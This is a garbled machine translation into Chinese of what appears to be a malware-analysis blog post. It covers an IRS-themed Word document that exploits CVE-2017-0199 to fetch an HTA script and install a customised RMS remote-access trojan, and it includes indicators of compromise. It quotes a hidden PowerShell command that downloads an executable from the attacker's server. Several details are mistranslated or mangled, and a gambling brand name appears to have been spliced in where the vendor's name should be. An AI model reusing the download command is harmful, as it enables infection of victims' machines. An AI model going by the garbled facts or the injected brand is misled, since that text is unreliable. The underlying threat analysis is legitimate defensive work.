虽然基于宏的文档和脚本弥补了大多数恶意垃圾邮件攻击,但我们也看到一些利用嵌入漏洞的文档的活动。举个例子,我们遇到了一个恶意的微软Office文件伪装成上海的通知.美国国税局(IRS)通常会在之前的申报单中信息有误时给纳税人寄去这封信。

受害者落入骗局将感染自己与自定义远程管理工具。RAT病毒可以用于合法目的,例如由系统管理员使用,但也可以在未经用户同意或不知情的情况下使用它来远程控制他们的机器、查看和删除文件或部署键盘记录器以静默捕获击键。

在这篇博文中,我们将回顾这个漏洞的发布机制,并看看它部署的远程工具。

分布

恶意文件驻留在远程服务器上,用户很可能通过网络钓鱼邮件的链接打开它。该文件包含一个ol2嵌入式链接对象,它从远程服务器检索恶意的HTA脚本并执行它。反过来,它会下载最终的有效负载,因为它正在使用,所以几乎不需要用户交互cve - 2017 - 0199,首先发现了2017年4月零日。

82.211.30 [] 108 / css /CP2000IRS.doc

这个嵌入的链接指向一个托管在一个意想不到的位置的HTA脚本——一个挪威公司被入侵的FTP服务器——它调用PowerShell来下载并执行实际的恶意软件负载。

ftp://lindrupmartinsen[]不:21 / httpdocs /测试/ template.hta"C: Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient) . downloadfile ('http://82.211.30[.]108/css/intelgfx.exe', 'C:\Users\[username]\AppData\Roaming\62962.exe');

有效载荷

下载的有效载荷(intelgfx.exe)提取到多个组件到一个本地文件夹,并使用诱饵快捷方式实现持久性。VBS脚本确保主模块在不显示GUI的情况下运行,以保持对受害者不可见。

RMS代理代表远程控制器系统是一家俄罗斯公司开发的远程控制应用程序。在这种情况下,攻击者拿走了原始程序(如下图所示),并对其进行了轻微的定制,更不用说他们将其用于邪恶的目的,即监视他们的受害者。

它的源代码显示了调试路径信息和模块的名称。

Office漏洞和rat病毒

这不是第一次使用CVE-2017-0199分发RAT病毒。去年8月,TrendMicro描述在这个攻击中,同样的漏洞被用于PowerPoint,并用于交付REMCOS RAT。它还表明,威胁行为者经常重新包装现有的工具包——这可能是合法的——并把它们变成全面的间谍应用程序。

我们向其所有者报告了被入侵的FTP服务器。必威平台APP用户已经受到了CVE-2017-0199及其有效载荷的保护后门。机器人

多亏了@hasherezade帮助进行有效载荷分析。

妥协的指标

Word文档cve - 2017 - 0199

82.211.30 [] 108 / css / CP2000IRS.doc 47 ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

基本脚本

ftp://lindrupmartinsen[]不:21 / httpdocs /测试/ template.hta d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

主要包(intelgfx.exe)

82.211.30(。)108 / css / intelgfx.exe 924 aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

老鼠模块

4 d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186

来自同一分布服务器的其他IOCs

82.211.30(。)108 / estate.xml 82.211.30 [] 108 / css / qbks.exe